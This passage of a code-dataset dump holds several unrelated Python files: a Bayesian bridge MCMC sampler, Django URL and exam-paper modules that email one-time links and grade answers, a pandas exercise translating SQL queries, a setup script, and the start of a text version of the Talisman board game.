mcmc_output['precond_blocksize']\n else:\n precond_blocksize = 0\n\n thin, reg_exponent, mvnorm_method, global_shrinkage_update = (\n mcmc_output[key] for key in\n ['thin', 'reg_exponent', 'mvnorm_method', 'global_shrinkage_update']\n )\n\n # Initalize the regression coefficient sampler with the previous state.\n self.reg_coef_sampler = SparseRegressionCoefficientSampler(\n init, self.prior_sd_for_unshrunk, mvnorm_method\n )\n self.reg_coef_sampler.set_internal_state(mcmc_output['_reg_coef_sampler_state'])\n\n if deallocate:\n mcmc_output.clear()\n\n next_mcmc_output = self.gibbs(\n 0, n_iter, thin, reg_exponent, init, mvnorm_method=mvnorm_method,\n precond_blocksize=precond_blocksize,\n global_shrinkage_update=global_shrinkage_update,\n _add_iter_mode=True\n )\n if merge:\n next_mcmc_output \\\n = self.merge_outputs(mcmc_output, next_mcmc_output)\n\n return next_mcmc_output\n\n def merge_outputs(self, mcmc_output, next_mcmc_output):\n\n samples = mcmc_output['samples']\n next_samples = next_mcmc_output['samples']\n next_mcmc_output['samples'] = {\n key : np.concatenate(\n (samples[key], next_samples[key]), axis=-1\n ) for key in samples.keys()\n }\n next_mcmc_output['n_post_burnin'] += mcmc_output['n_post_burnin']\n next_mcmc_output['runtime'] += mcmc_output['runtime']\n\n return next_mcmc_output\n\n def gibbs(self, n_burnin, n_post_burnin, thin=1, reg_exponent=.5,\n init={}, mvnorm_method='cg', precond_blocksize=0, seed=None,\n global_shrinkage_update='sample', _add_iter_mode=False):\n \"\"\"\n MCMC implementation for the Bayesian bridge.\n\n Parameters\n ----------\n n_burnin : int\n number of burn-in samples to be discarded\n n_post_burnin : int\n number of posterior draws to be saved\n mvnorm_method : str, {'direct', 'cg'}\n precond_blocksize : int\n size of the block preconditioner\n global_shrinkage_update : str, {'sample', 'optimize', None}\n\n \"\"\"\n\n if not _add_iter_mode:\n self.rg.set_seed(seed)\n\n if self.model not in ('linear', 'logit'):\n raise NotImplementedError()\n\n n_iter = n_burnin + n_post_burnin\n\n # Initial state of the Markov chain\n beta, sigma_sq, obs_prec, lshrink, gshrink, init = \\\n self.initialize_chain(init)\n\n if not _add_iter_mode:\n self.reg_coef_sampler = SparseRegressionCoefficientSampler(\n init, self.prior_sd_for_unshrunk, mvnorm_method\n )\n\n # Pre-allocate\n samples = {}\n self.pre_allocate(samples, n_post_burnin, thin)\n n_cg_iter = np.zeros(n_iter)\n\n # Start Gibbs sampling\n start_time = time.time()\n for mcmc_iter in range(1, n_iter + 1):\n\n if self.model == 'linear':\n obs_prec = np.ones(self.n_obs) / sigma_sq\n\n beta, n_cg_iter[mcmc_iter - 1] = self.update_beta(\n obs_prec, gshrink, lshrink, mvnorm_method, precond_blocksize\n )\n\n obs_prec, sigma_sq = self.update_obs_precision(beta)\n\n # Draw from gshrink | \\beta and then lshrink | gshrink, \\beta.\n # (The order matters.)\n gshrink = self.update_global_shrinkage(\n gshrink, beta[self.n_unshrunk:], reg_exponent, global_shrinkage_update)\n\n lshrink = self.update_local_shrinkage(\n gshrink, beta[self.n_unshrunk:], reg_exponent)\n\n self.store_current_state(samples, mcmc_iter, n_burnin, thin,\n beta, lshrink, gshrink, sigma_sq, obs_prec, reg_exponent)\n\n runtime = time.time() - start_time\n mcmc_output = {\n 'samples': samples,\n 'init': init,\n 'n_burnin': n_burnin,\n 'n_post_burnin': n_post_burnin,\n 'thin': thin,\n 'seed': seed,\n 'n_coef_wo_shrinkage': self.n_unshrunk,\n 'prior_sd_for_unshrunk': self.prior_sd_for_unshrunk,\n 'reg_exponent': reg_exponent,\n 'mvnorm_method': mvnorm_method,\n 'runtime': runtime,\n 'global_shrinkage_update': global_shrinkage_update,\n '_random_gen_state': self.rg.get_state(),\n '_reg_coef_sampler_state': self.reg_coef_sampler.get_internal_state()\n }\n if mvnorm_method == 'cg':\n mcmc_output['n_cg_iter'] = n_cg_iter\n if precond_blocksize > 0:\n mcmc_output['precond_blocksize'] = precond_blocksize\n\n return mcmc_output\n\n def pre_allocate(self, samples, n_post_burnin, thin):\n\n n_sample = math.floor(n_post_burnin / thin) # Number of samples to keep\n samples['beta'] = np.zeros((self.n_pred, n_sample))\n samples['local_shrinkage'] = np.zeros((self.n_pred - self.n_unshrunk, n_sample))\n samples['global_shrinkage'] = np.zeros(n_sample)\n if self.model == 'linear':\n samples['sigma_sq'] = np.zeros(n_sample)\n elif self.model == 'logit':\n samples['obs_prec'] = np.zeros((self.n_obs, n_sample))\n samples['logp'] = np.zeros(n_sample)\n\n return\n\n def initialize_chain(self, init):\n # Choose the user-specified state if provided, the default ones otherwise.\n\n if 'beta' in init:\n beta = init['beta']\n if not len(beta) == self.n_pred:\n raise ValueError('An invalid initial state.')\n else:\n beta = np.zeros(self.n_pred)\n if 'intercept' in init:\n beta[0] = init['intercept']\n\n if 'sigma' in init:\n sigma_sq = init['sigma'] ** 2\n else:\n sigma_sq = np.mean((self.y - self.X.dot(beta)) ** 2)\n\n if 'obs_prec' in init:\n obs_prec = np.ascontiguousarray(init['obs_prec'])\n # Cython requires a C-contiguous array.\n if not len(obs_prec) == self.n_obs:\n raise ValueError('An invalid initial state.')\n elif self.model == 'logit':\n obs_prec = self.compute_polya_gamma_mean(self.n_trial, self.X.dot(beta))\n else:\n obs_prec = None\n\n if 'local_shrinkage' in init:\n lshrink = init['local_shrinkage']\n if not len(lshrink) == (self.n_pred - self.n_unshrunk):\n raise ValueError('An invalid initial state.')\n else:\n lshrink = np.ones(self.n_pred - self.n_unshrunk)\n\n if 'global_shrinkage' in init:\n gshrink = init['global_shrinkage']\n else:\n gshrink = .01\n\n init = {\n 'beta': beta,\n 'sigma_sq': sigma_sq,\n 'obs_prec': obs_prec,\n 'local_shrinkage': lshrink,\n 'global_shrinkage': gshrink\n }\n\n return beta, sigma_sq, obs_prec, lshrink, gshrink, init\n\n def compute_polya_gamma_mean(self, shape, tilt):\n min_magnitude = 1e-5\n pg_mean = shape.copy() / 2\n is_nonzero = (np.abs(tilt) > min_magnitude)\n pg_mean[is_nonzero] \\\n *= 1 / tilt[is_nonzero] \\\n * (np.exp(tilt[is_nonzero]) - 1) / (np.exp(tilt[is_nonzero]) + 1)\n return pg_mean\n\n def update_beta(self, obs_prec, gshrink, lshrink, mvnorm_method, precond_blocksize):\n\n if self.model == 'linear':\n y_gaussian = self.y\n elif self.model == 'logit':\n y_gaussian = (self.y - self.n_trial / 2) / obs_prec\n\n beta, n_cg_iter = self.reg_coef_sampler.sample_gaussian_posterior(\n y_gaussian, self.X, obs_prec, gshrink, lshrink,\n mvnorm_method, precond_blocksize\n )\n\n return beta, n_cg_iter\n\n def update_obs_precision(self, beta):\n\n sigma_sq = None\n obs_prec = None\n if self.model == 'linear':\n resid = self.y - self.X.dot(beta)\n scale = np.sum(resid ** 2) / 2\n sigma_sq = scale / self.rg.np_random.gamma(self.n_obs / 2, 1)\n elif self.model == 'logit':\n obs_prec = self.rg.polya_gamma(\n self.n_trial, self.X.dot(beta),self.X.shape[0])\n\n return obs_prec, sigma_sq\n\n def update_global_shrinkage(\n self, gshrink, beta_with_shrinkage, reg_exponent, method='sample'):\n # :param method: {\"sample\", \"optimize\", None}\n\n if method == 'optimize':\n gshrink = self.monte_carlo_em_global_shrinkage(\n beta_with_shrinkage, reg_exponent)\n\n elif method == 'sample':\n\n if self.prior_type['global_shrinkage'] == 'jeffreys':\n\n # Conjugate update for phi = 1 / gshrink ** reg_exponent\n shape = beta_with_shrinkage.size / reg_exponent\n scale = 1 / np.sum(np.abs(beta_with_shrinkage) ** reg_exponent)\n phi = self.rg.np_random.gamma(shape, scale=scale)\n gshrink = 1 / phi ** (1 / reg_exponent)\n\n elif self.prior_type['global_shrinkage'] == 'half-cauchy':\n\n gshrink = self.slice_sample_global_shrinkage(\n gshrink, beta_with_shrinkage, self.prior_param['global_shrinkage']['scale'], reg_exponent\n )\n else:\n raise NotImplementedError()\n\n return gshrink\n\n def monte_carlo_em_global_shrinkage(\n self, beta_with_shrinkage, reg_exponent):\n phi = len(beta_with_shrinkage) / reg_exponent \\\n / np.sum(np.abs(beta_with_shrinkage) ** reg_exponent)\n gshrink = phi ** - (1 / reg_exponent)\n return gshrink\n\n def slice_sample_global_shrinkage(\n self, gshrink, beta_with_shrinkage, global_scale, reg_exponent):\n \"\"\" Slice sample phi = 1 / gshrink ** reg_exponent. \"\"\"\n\n n_update = 10 # Slice sample for multiple iterations to ensure good mixing.\n\n # Initialize a gamma distribution object.\n shape = (beta_with_shrinkage.size + 1) / reg_exponent\n scale = 1 / np.sum(np.abs(beta_with_shrinkage) ** reg_exponent)\n gamma_rv = sp.stats.gamma(shape, scale=scale)\n\n phi = 1 / gshrink\n for i in range(n_update):\n u = self.rg.np_random.uniform() \\\n / (1 + (global_scale * phi ** (1 / reg_exponent)) ** 2)\n upper = (np.sqrt(1 / u - 1) / global_scale) ** reg_exponent\n # Invert the half-Cauchy density.\n phi = gamma_rv.ppf(gamma_rv.cdf(upper) * self.rg.np_random.uniform())\n if np.isnan(phi):\n # Inverse CDF method can fail if the current conditional\n # distribution is drastically different from the previous one.\n # In this case, ignore the slicing variable and just sample from\n # a Gamma.\n phi = gamma_rv.rvs()\n gshrink = 1 / phi ** (1 / reg_exponent)\n\n return gshrink\n\n\n def update_local_shrinkage(self, gshrink, beta_with_shrinkage, reg_exponent):\n\n lshrink_sq = 1 / np.array([\n 2 * self.rg.tilted_stable(reg_exponent / 2, (beta_j / gshrink) ** 2)\n for beta_j in beta_with_shrinkage\n ])\n lshrink = np.sqrt(lshrink_sq)\n\n # TODO: Pick the lower and upper bound more carefully.\n if np.any(lshrink == 0):\n warn_message_only(\n \"Local shrinkage parameter under-flowed. Replacing with a small number.\")\n lshrink[lshrink == 0] = 10e-16\n elif np.any(np.isinf(lshrink)):\n warn_message_only(\n \"Local shrinkage parameter under-flowed. Replacing with a large number.\")\n lshrink[np.isinf(lshrink)] = 2.0 / gshrink\n\n return lshrink\n\n def store_current_state(self, samples, mcmc_iter, n_burnin, thin,\n beta, lshrink, gshrink, sigma_sq, obs_prec, reg_exponent):\n\n if mcmc_iter > n_burnin and (mcmc_iter - n_burnin) % thin == 0:\n index = math.floor((mcmc_iter - n_burnin) / thin) - 1\n samples['beta'][:, index] = beta\n samples['local_shrinkage'][:, index] = lshrink\n samples['global_shrinkage'][index] = gshrink\n if self.model == 'linear':\n samples['sigma_sq'][index] = sigma_sq\n elif self.model == 'logit':\n samples['obs_prec'][:, index] = obs_prec\n samples['logp'][index] = \\\n self.compute_posterior_logprob(beta, gshrink, sigma_sq, reg_exponent)\n\n return\n\n def compute_posterior_logprob(self, beta, gshrink, sigma_sq, reg_exponent):\n\n prior_logp = 0\n\n if self.model == 'logit':\n predicted_prob = 1 / (1 + np.exp( - self.X.dot(beta)))\n machine_prec = 2. ** - 53\n within_bd = np.logical_and(\n predicted_prob > machine_prec,\n predicted_prob < 1. - machine_prec\n )\n loglik = np.sum(\n self.y[within_bd] * np.log(predicted_prob[within_bd]) \\\n + (self.n_trial - self.y)[within_bd]\n * np.log(1 - predicted_prob[within_bd])\n )\n elif self.model == 'linear':\n loglik = - len(self.y) * math.log(sigma_sq) / 2 \\\n - np.sum((self.y - self.X.dot(beta)) ** 2) / sigma_sq\n prior_logp += - math.log(sigma_sq) / 2\n\n n_shrunk_coef = len(beta) - self.n_unshrunk\n\n # Contribution from beta | gshrink.\n prior_logp += \\\n - n_shrunk_coef * math.log(gshrink) \\\n - np.sum(np.abs(beta[self.n_unshrunk:] / gshrink) ** reg_exponent)\n\n # for coefficients without shrinkage.\n prior_logp += - 1 / 2 * np.sum(\n (beta[:self.n_unshrunk] / self.prior_sd_for_unshrunk) ** 2\n )\n prior_logp += - np.sum(np.log(\n self.prior_sd_for_unshrunk[self.prior_sd_for_unshrunk < float('inf')]\n ))\n if self.prior_type['global_shrinkage'] == 'jeffreys':\n prior_logp += - math.log(gshrink)\n else:\n raise NotImplementedError()\n\n logp = loglik + prior_logp\n\n return logp\n","sub_path":"bayesbridge/bayesbridge.py","file_name":"bayesbridge.py","file_ext":"py","file_size_in_byte":18504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"321165294","text":"__author__ = 'gchrysos'\n# definition of paths and folders useful for the pipeline.\n# Change with caution, as changes will be reflected to the whole pipeline.\n\nimport os\nsep = os.path.sep # separator (should be '/' for Linux and '\\' for Windows).\n\n__p_base_db = '/vol/atlas/databases/'\n_p_base_personal = '/vol/atlas/homes/grigoris/'\n\n# paths of public databases used for trainings\npath_to_helen = __p_base_db + 'helen/trainset/' # helen trainset\npath_to_ibug = __p_base_db + 'ibug/'\npath_to_lfpw = __p_base_db + 'lfpw/trainset/'\npath_to_cofw = _p_base_personal + 'external/cofw/frames/trainset/'\npath_pascal_base = _p_base_personal + 'external/VOCdevkit/VOC2007/'\npath_closed_eyes = _p_base_personal + 'Databases/eyes/grigoris_competition_8_2015/frames/'\n\npath_pickles = _p_base_personal + 'company_videos/pickles/'\npath_shape_pred = _p_base_personal + 'raps_menpo/shape_predictor_68_face_landmarks.dat' # predictor data trained to be used from dlib shape predictor\n\n# confirm that the ones above are valid paths\nfrom utils import check_if_path\ndef __db_p(path, db_name):\n return check_if_path(path, 'The database {} is not in the path provided ({}).'.format(db_name, path))\n\nif not (__db_p(path_to_helen, 'helen') and __db_p(path_to_ibug, 'ibug') and __db_p(path_pascal_base, 'pascal'))\\\n and (__db_p(path_to_lfpw, 'lfpw')):\n print('Potential problem if one of the databases are not in the path provided.')\n\n\n# folders for reading and writing in the project clips\nfoldvis = 'visualisations' + sep # folder where all image visualisations are\nframes = 'frames' + sep # folder for reading the frames/images\nfoldcmp = 'compare' + sep # folder for visual comparisons (will be inside visualisations by default)\n\nvisual = 0 # whether the landmarks should be exported during the process (1 for yes)\nimg_type_out = '.png' # extension (and type) of the images that will be exported\npts_type_out = '.pts'\n\nlist_done = [] # clips that should not be processed\n# list_done =['830386', '821238', '830183'];\n\n# definition of colours for visualisation\ncolour = ['r', 'b', 'g', 'c', 'm', 'k', 'w']\ncol_len = len(colour)\n\n# First refers to original image, second to cropped one.\nrender_options = {'colours': [colour,\n colour],\n 'sizes': [[2]*10,\n [2]*10],\n 'edgesizes': [[1]*10,\n [2]*10]}\n\n\n# common imports for all files\nimport os\nimport sys\nimport numpy as np\nimport glob\nfrom datetime import datetime\n\n","sub_path":"utils/path_and_folder_definition.py","file_name":"path_and_folder_definition.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"174971151","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'fundraise.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^', include('upnextme.urls',\n namespace='upnextme')),\n url(r'^$', 'upnextme.views.index', name='index'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^chaining/', include('smart_selects.urls')),\n url(r'^grappelli/', include('grappelli.urls')),\n url('', include('social.apps.django_app.urls', namespace='social')),\n url('', include('django.contrib.auth.urls', namespace='auth')),\n )\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"fundraise/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"78222097","text":"class Option(object):\n def __init__(self):\n self.batchsize = 128\n self.latentsize = 100\n self.y_ebdsize = 28\n self.latentoutsize = 1024*2*2\n self.num_classes = 16\n self.micro_in_macro = 4\n self.macro_in_full = 4\n self.datadir='../input/img_align_celeba/img_align_celeba'\n self.macro_size = 64\n self.micro_size = 32\n self.full_size = 128\n self.LAMBDA = 10\n self.ALPHA = 100\n self.epoch = 50\n self.max_dataset = 0\n self.my_model_dir = 'my_model'\n self.showgrad = False","sub_path":"option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"264480022","text":"from .script import Qp\nfrom .models import Question, Script\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes\nfrom django.utils.encoding import force_text\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.urls import reverse\n\n\ndef set(title, users):\n\tqp=Qp(title)\n\ttemplate_name=\"qheader.html\"\n\tfor user in users:\n\t\tscript=Script()\n\t\tscript.title=title\n\t\tscript.userid=user\n\t\tscript.save()\n\t\t\n\t\tqp.olotpalot()\n\t\tfor frag in qp.fullset:\n\t\t\tattempt=Question()\n\t\t\tattempt.statement=frag.question\n\t\t\tattempt.option1 = frag.options[0].choice\n\t\t\tattempt.option2 = frag.options[1].choice\n\t\t\tattempt.option3 = frag.options[2].choice\n\t\t\tattempt.option4 = frag.options[3].choice\n\t\t\tcount=1\n\t\t\tfor answer in frag.options:\n\t\t\t\tif answer.ans:\n\t\t\t\t\tattempt.correct_ans=count\n\t\t\t\tcount+=1\n\t\t\tattempt.script = script\n\t\t\tattempt.save()\n\ndef sendotlforexam(title):\n\tpapers=Script.objects.filter(send_otl_script=False).filter(title=title)\n\ttext_content=\"Your one time link Email\"\n\tsubject=\"Examination Script for \" + title\n\ttemplate_name=\"otl.html\"\n\tfrom_email=settings.EMAIL_HOST_USER\n\tfor paper in papers:\n\t\trecipients=[paper.userid.email]\n\n\t\tkwargs = {\n\t\t\t\"scriptid64\" : urlsafe_base64_encode(force_bytes(paper.id)),\n\t\t\t\"token\" : default_token_generator.make_token(paper.userid)\n\t\t}\n\t\tthe_url = reverse(\"exam_request\", kwargs=kwargs)\n\t\totl_url = \"{0}://{1}{2}\".format(\"http\", \"www.drylab.in:8000\", the_url)\n\n\t\tcontext = {\n\t\t\t'user': paper.userid,\n\t\t\t'otl_url': otl_url,\n\t\t}\n\t\thtml_content = render_to_string(template_name, context)\n\t\temail = EmailMultiAlternatives(subject, text_content, from_email, recipients)\n\t\temail.attach_alternative(html_content, \"text/html\")\n\t\temail.send()\n\t\tpaper.send_otl_script=True\n\t\tpaper.save()\n\t\tprint(\"Mail has been sent to {0}\\n\".format(paper.userid.email))\n\ndef evaluate(title):\n\tpapers=Script.objects.filter(received_script=True).filter(title=title)\n\tfor paper in papers:\n\t\tpaper.number_scored = 0\n\t\tref=paper.question_set.all()\n\t\tif paper.user_ans0 == ref[0].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans1 == ref[1].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans2 == ref[2].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans3 == ref[3].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans4 == ref[4].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans5 == ref[5].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans6 == ref[6].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans7 == ref[7].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans8 == ref[8].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tif paper.user_ans9 == ref[9].correct_ans:\n\t\t\tpaper.number_scored += 1\n\t\tpaper.save()\n\t\t\t\n\t\n\ndef sendresult(title):\n\tpapers=Script.objects.filter(received_script=True).filter(send_result=False).filter(title=title)\n\ttext_content=\"Your result for exam in \" + title\n\tsubject=\"Examination result for \" + title\n\ttemplate_name=\"result.html\"\n\tfrom_email=settings.EMAIL_HOST_USER\n\tfor paper in papers:\n\t\trecipients = [paper.userid.email]\n\t\tcontext = {\n\t\t\t'script' : paper,\n\t\t\t'questions' : paper.question_set.all()\n\t\t}\n\t\thtml_content = render_to_string(template_name, context)\n\t\temail = EmailMultiAlternatives(subject, text_content, from_email, recipients)\n\t\temail.attach_alternative(html_content, \"text/html\")\n\t\temail.send()\n\t\tpaper.send_result=True\n\t\tprint(\"Mail has been sent to {0}\\n\".format(paper.userid.email))\n","sub_path":"exam/papersetting.py","file_name":"papersetting.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409790496","text":"x=[0]*10\nlista=[]\ntot=0\ndias=0\nfor i in range(10):\n x[i]=int(input())\n tot+=x[i]\n lista.append(x[i])\nmedia=tot/10\nfor i in range(10):\n if x[i]>media:\n dias+=1\nlista.sort()\nprint(lista[1])\nprint(lista[-1])\nprint(media)\nprint(dias)","sub_path":"Vetor/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"36009","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020/8/16\n# @Author : xh.w\n# @File : job.py.py\n# 作业要求:请将以下的 SQL 语句翻译成 pandas语句\n\nimport pandas as pd\n\nimport pymysql\n\n\nsql = 'SELECT * FROM movies_info'\nconnect = pymysql.connect(\n host='192.168.3.87',\n port=3306,\n user='root',\n password='123456',\n db='test'\n)\n\n# 1. SELECT * FROM data;\ndf = pd.read_sql(sql, connect)\n\n# 2. SELECT * FROM data LIMIT 10;\ndf.head(10)\n# 3. SELECT id FROM data; //id 是 data 表的特定一列\ndf['id']\n# 4. SELECT COUNT(id) FROM data;\ndf['id'].count()\n# 5. SELECT * FROM data WHERE id<1000 AND age>30;\ndf[(df['id'] < 1000) & (df['age'] > 30)]\n# 6. SELECT id,COUNT(DISTINCT order_id) FROM table1 GROUP BY id;\ndf.groupby('id')['order_id'].count()\n# 7. SELECT * FROM table1 t1 INNER JOIN table2 t2 ON t1.id = t2.id;\npd.merge(table1, table2, on= 'id', how='inner')\n# 8. SELECT * FROM table1 UNION SELECT * FROM table2;\npd.concat([table1, table2])\n# 9. DELETE FROM table1 WHERE id=10;\ndf.drop(11, axis=0)\n# 10. ALTER TABLE table1 DROP COLUMN column_name;\ndf.drop('column_name', axis=1)\n\n","sub_path":"week04/homework/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"333216103","text":"from setuptools import setup, find_packages\nimport os\nimport jetpack\n\nhere = os.path.abspath(os.path.dirname(__file__))\ntry:\n README = open(os.path.join(here, 'README.md')).read()\nexcept IOError:\n README = ''\n\nsetup(name='jetpack',\n version=jetpack.__version__,\n author='Niru Maheswaranathan',\n author_email='nirum@stanford.edu',\n url='https://github.com/nirum/jetpack.git',\n requires=['numpy', 'scipy', 'matplotlib', 'emoji'],\n long_description=README,\n packages=find_packages(),\n license='LICENSE.md'\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"189702616","text":"'''\nTalisman v0.2\n\nRoadmap:\nPlaces\nObjects\nFollowers\nPurchases\nSentinel\n\ninitialized in trinket.io\nknown bugs:\nfate reroll mechanic\npaying off Bandit\n'''\n\n# region: Initalization\nimport random as r # Random Module\n\nerror=\"\\nUh, I'm not quite sure what that means. Please try again: \" # Error Prompt\nimplem=\"Unfortunately this feature has not yet been implemented.\" # Implementation Error Prompt\n\n# Outer Region Board\nouter=(\"Tavern\",\"Southwestern Fields\",\"Ruins\",\"Western Plains\",\"Forest\",\"Northwestern Fields\",\"Village\",\"Northern Fields\",\"Graveyard\",\"Northern Woods\",\"Sentinel Space\",\"Northern Hills\",\"Chapel\",\"Northeastern Fields\",\"Crags\",\"Eastern Plains\",\"Eastern Woods\",\"Southeastern Fields\",\"City\",\"Southern Fields\",\"Southern Hills\",\"Midsouthern Plains\",\"Southern Woods\",\"Southeastern Plains\")\n\n# Adventure Cards\nadventures = [\"Angel\",\"Blizzard\",\"Book of Spells\",\"Devil\",\"Evil Darkness\",\"Imp\",\"Magical Vortex\",\"Market Day\",\"Mephistopheles\",\"Pestilence\",\"Raiders\",\"Siren\",\"Storm\",\"Wolf\",\"Ape\",\"Bear\",\"Lion\",\"Serpent\",\"Giant\",\"Spectre\",\"Demon\",\"Enchanter\",\"Fairy\",\"Healer\",\"Hermit\",\"Mage\",\"Phantom\",\"Sorcerer\",\"Witch\",\"Alchemist\",\"Cursed by a Hag\",\"Gnome\",\"Maiden\",\"Mercenary\",\"Mule\",\"Pixie\",\"Poltergeist\",\"Prince\",\"Princess\",\"Unicorn\",\"Amulet\",\"Cross\",\"Holy Grail\",\"Magic Belt\",\"Orb of Knowledge\",\"Potion of Strength\",\"Ring\",\"Solomon's Crown\",\"Wand\",\"Holy Lance\",\"Runesword\",\"Raft\",\"Water Bottle\",\"Armour\",\"Helmet\",\"Shield\",\"Axe\",\"Cave\",\"Fountain of Wisdom\",\"Magic Portal\",\"Magic Stream\",\"Market\",\"Marsh\",\"Maze\",\"Pool of Life\",\"Shrine\"]+[\"Wild Boar\",\"Goblin\",\"Hobgoblin\",\"Bandit\",\"Ogre\",\"Lemure\",\"Shadow\",\"Ghost\",\"Wraith\",\"Guide\",\"Talisman\",\"Sword\"]*2+[\"Dragon\",\"Two Bags of Gold\"]*3+[\"Bag of Gold\"]*8\nevents = [\"Angel\",\"Blizzard\",\"Book of Spells\",\"Devil\",\"Evil Darkness\",\"Imp\",\"Magical Vortex\",\"Market Day\",\"Mephistopheles\",\"Pestilence\",\"Raiders\",\"Siren\",\"Storm\"]\nanimals = [\"Wild Boar\",\"Wolf\",\"Ape\",\"Bear\",\"Lion\",\"Serpent\"]\ndragons = [\"Dragon\"]\nmonsters = [\"Goblin\",\"Hobgoblin\",\"Bandit\",\"Ogre\",\"Giant\"]\nspirits = [\"Lemure\",\"Shadow\",\"Spectre\",\"Ghost\",\"Wraith\",\"Demon\"]\nenemies = animals + dragons + monsters + spirits\nstrangers = [\"Enchanter\",\"Fairy\",\"Healer\",\"Hermit\",\"Mage\",\"Phantom\",\"Sorcerer\",\"Witch\"]\nfollowers = [\"Alchemist\",\"Cursed by a Hag\",\"Gnome\",\"Guide\",\"Maiden\",\"Mercenary\",\"Mule\",\"Pixie\",\"Poltergeist\",\"Prince\",\"Princess\",\"Unicorn\"]\nobjects = [\"Amulet\",\"Cross\",\"Holy Grail\",\"Magic Belt\",\"Orb of Knowledge\",\"Potion of Strength\",\"Ring\",\"Solomon's Crown\",\"Talisman\",\"Wand\",\"Holy Lance\",\"Runesword\",\"Bag of Gold\",\"Raft\",\"Two Bags of Gold\",\"Water Bottle\",\"Armour\",\"Helmet\",\"Shield\",\"Axe\",\"Sword\"]\nmagicobjects = [\"Amulet\",\"Cross\",\"Holy Grail\",\"Magic Belt\",\"Orb of Knowledge\",\"Potion of Strength\",\"Ring\",\"Solomon's Crown\",\"Talisman\",\"Wand\",\"Holy Lance\",\"Runesword\"]\nweapons = [\"Holy Lance\",\"Runesword\",\"Axe\",\"Sword\"]\narmours = [\"Armour\",\"Helmet\",\"Shield\",\"Axe\",\"Sword\"]\n\n# Character Template\nemptydict={\n \"name\":\"\",\n \"start\":\"\",\n \"align\":\"\",\n \"strength\":0,\n \"craft\":0,\n \"life\":0,\n \"fate\":0,\n \"gold\":1,\n \"addinfo\":\"\",\n \"space\":\"\",\n \"mins\":0,\n \"minc\":0,\n \"maxl\":0,\n \"maxf\":0\n}\n\n# Cards on Spaces\nspacedict={}\nfor space in outer:\n spacedict.update({space:[]})\n\n# Dice Rolling\ndef roll():\n return r.choice(range(1,7))\n\n# Game Over\ndef gameover():\n print(\"\\nSorry, but that's the whole game at the moment. Check again later, more coming soon! In the meantime, check out your stats: \")\n print(\"Strength: {strength}\\nCraft: {craft}\\nGold: {gold}\\nFate: {fate}\\nLife: {life} \\nAlignment: {align}\".format(**chardict))\n quit()\n#endregion\n\n# region: Player functions\n# Lose Life\ndef wound():\n chardict[\"life\"]-=1\n if chardict[\"life\"]<=0:\n print(\"Sorry, you have died. GAME OVER\")\n gameover()\n# Heal Life\ndef heal(n):\n if chardict[\"life\"]+n<=chardict[\"maxl\"]:\n chardict[\"life\"]+=n\n if chardict[\"life\"]>=chardict[\"maxl\"]:\n chardict[\"life\"]=chardict[\"maxl\"]\n print(\"You are now at max life.\")\n else:\n print(\"Sorry, you are already at max life.\")\n# Lose Gold\ndef poor(n):\n if chardict[\"gold\"]-n>0:\n chardict[\"gold\"]-=n\n else:\n chardict[\"gold\"]=0\n print(\"You are now bankrupt.\")\n# Lose Strength\ndef weak():\n if chardict[\"strength\"]>chardict[\"mins\"]:\n chardict[\"strength\"]+=1\n else:\n print(\"Your strength is already at its minimum.\")\n# Lose Craft\ndef dumb():\n if chardict[\"craft\"]>chardict[\"minc\"]:\n chardict[\"craft\"]+=1\n else:\n print(\"Your craft is already at its minimum.\")\n# Lose Fate\ndef losefate():\n if chardict[\"fate\"]>1:\n chardict[\"fate\"]-=1\n else:\n print(\"Your have no fate left.\")\n# Replenish Fate\ndef replenish():\n if chardict[\"fate\"]>=chardict[\"maxf\"]:\n print(\"You are already at max fate.\")\n else:\n chardict[\"fate\"] = chardict[\"maxf\"]\n# Change Alignment\ndef realign(new):\n if chardict[\"align\"] != new: chardict[\"align\"] = new\n else: print(\"You were already 